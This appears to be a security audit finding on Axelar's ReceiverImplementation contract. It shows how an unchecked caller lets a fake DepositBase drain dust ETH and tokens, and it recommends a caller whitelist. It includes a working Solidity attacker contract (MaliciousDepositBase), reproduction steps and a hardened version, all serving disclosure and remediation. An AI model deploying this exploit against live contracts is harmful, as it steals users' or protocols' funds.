Malicious DepositBase may steal dust funds from ReceiverImplementation
// @dev This function is used for delegate by DepositReceiver deployed above
// Context: msg.sender == AxelarDepositService, this == DepositReceiver
function receiveAndSendToken(
    address payable refundAddress,
    string calldata destinationChain,
    string calldata destinationAddress,
    string calldata symbol
) external {
    // Always refunding native otherwise it's sent on DepositReceiver self destruction
    if (address(this).balance > 0) refundAddress.transfer(address(this).balance);

    address tokenAddress = IAxelarGateway(gateway).tokenAddresses(symbol);

    // Checking with AxelarDepositService if need to refund a token
    address refund = DepositBase(msg.sender).refundToken();
    if (refund != address(0)) {
        _safeTransfer(refund, refundAddress, IERC20(refund).balanceOf(address(this)));
        return;
    }

    uint256 amount = IERC20(tokenAddress).balanceOf(address(this));
    if (amount == 0) revert NothingDeposited();

    // Sending the token through the gateway
    IERC20(tokenAddress).approve(gateway, amount);
    IAxelarGateway(gateway).sendToken(destinationChain, destinationAddress, symbol, amount);
}
The comment says this function is meant to run under delegatecall from a DepositReceiver, with msg.sender being the AxelarDepositService, but nothing enforces either assumption: receiveAndSendToken is external, the caller is never checked, and the only thing it asks msg.sender for is refundToken(). An attacker can therefore deploy a malicious DepositBase whose refundToken() returns the address of the token they want to take, and call ReceiverImplementation.receiveAndSendToken directly from that contract, passing an address they control as refundAddress. Because the call is direct rather than delegated, address(this) is the ReceiverImplementation itself, so any native token it holds is sent to the attacker by if (address(this).balance > 0) refundAddress.transfer(address(this).balance); and any ERC20 balance of the chosen token is sent by _safeTransfer(refund, refundAddress, IERC20(refund).balanceOf(address(this)));. The amounts at risk are whatever dust has accumulated on the implementation contract, but the drain is repeatable for every token it ever holds.
Manual review
Whitelist the valid AxelarDepositService: store its address in ReceiverImplementation at deployment and revert in receiveAndSendToken (and any sibling refund functions) unless msg.sender equals it, so an arbitrary contract can no longer pose as DepositBase and choose the refund token and refund recipient.
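The following is an added example, not Axelar's code, that puts the attack and the whitelist mitigation side by side. It covers both the attack walkthrough and the recommendation above. The interface names (IReceiverImplementation, IDepositBase, IAxelarGateway), the contract names MaliciousDepositBase and ReceiverImplementationFixed, and the constructor parameters are assumptions modelled on the snippet in the report; the error and function names reused from the report are kept as they appear there.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.9;

// Added example (not Axelar's code). Interfaces are minimal assumptions
// derived from the calls visible in the vulnerable snippet.
interface IERC20 {
    function balanceOf(address account) external view returns (uint256);
    function transfer(address to, uint256 amount) external returns (bool);
    function approve(address spender, uint256 amount) external returns (bool);
}

interface IAxelarGateway {
    function tokenAddresses(string calldata symbol) external view returns (address);
    function sendToken(string calldata destinationChain, string calldata destinationAddress, string calldata symbol, uint256 amount) external;
}

interface IDepositBase {
    function refundToken() external view returns (address);
}

interface IReceiverImplementation {
    function receiveAndSendToken(address payable refundAddress, string calldata destinationChain, string calldata destinationAddress, string calldata symbol) external;
}

// Attacker-controlled stand-in for DepositBase. The vulnerable implementation
// only ever asks msg.sender for refundToken(), so returning the address of the
// token sitting as dust on ReceiverImplementation is all that is required.
contract MaliciousDepositBase {
    address public refundToken;

    constructor(address tokenToSteal) {
        refundToken = tokenToSteal;
    }

    // Calls the implementation directly rather than through a DepositReceiver
    // delegatecall. Inside receiveAndSendToken, address(this) is then the
    // implementation itself, and its own ETH and token balances are "refunded"
    // to the attacker-supplied refundAddress. The chain/address/symbol
    // arguments are irrelevant because the refund branch returns early.
    function drain(IReceiverImplementation impl, address payable to) external {
        impl.receiveAndSendToken(to, "", "", "");
    }

    // Needed so refundAddress.transfer(...) succeeds when `to` is this contract.
    receive() external payable {}
}

// Hardened version of the refund path: identical logic, but only the single
// AxelarDepositService fixed at deployment may call it.
contract ReceiverImplementationFixed {
    error NotDepositService();
    error NothingDeposited();

    address public immutable depositService;
    address public immutable gateway;

    constructor(address depositService_, address gateway_) {
        depositService = depositService_;
        gateway = gateway_;
    }

    function receiveAndSendToken(
        address payable refundAddress,
        string calldata destinationChain,
        string calldata destinationAddress,
        string calldata symbol
    ) external {
        // Whitelist check: an arbitrary contract can no longer act as DepositBase,
        // so neither the refund token nor the refund recipient is attacker-chosen.
        if (msg.sender != depositService) revert NotDepositService();

        if (address(this).balance > 0) refundAddress.transfer(address(this).balance);

        address tokenAddress = IAxelarGateway(gateway).tokenAddresses(symbol);

        address refund = IDepositBase(msg.sender).refundToken();
        if (refund != address(0)) {
            uint256 bal = IERC20(refund).balanceOf(address(this));
            require(IERC20(refund).transfer(refundAddress, bal), "refund transfer failed");
            return;
        }

        uint256 amount = IERC20(tokenAddress).balanceOf(address(this));
        if (amount == 0) revert NothingDeposited();

        IERC20(tokenAddress).approve(gateway, amount);
        IAxelarGateway(gateway).sendToken(destinationChain, destinationAddress, symbol, amount);
    }
}
```

To reproduce against the vulnerable contract, deploy MaliciousDepositBase with the dust token's address, send a little ETH and a little of that token to the ReceiverImplementation address, and call drain(impl, attackerAddress): both balances land at attackerAddress. Against ReceiverImplementationFixed the same call reverts with NotDepositService before any transfer. Note that the fix must also be applied to every other externally callable function on the implementation that trusts msg.sender as DepositBase, not only receiveAndSendToken.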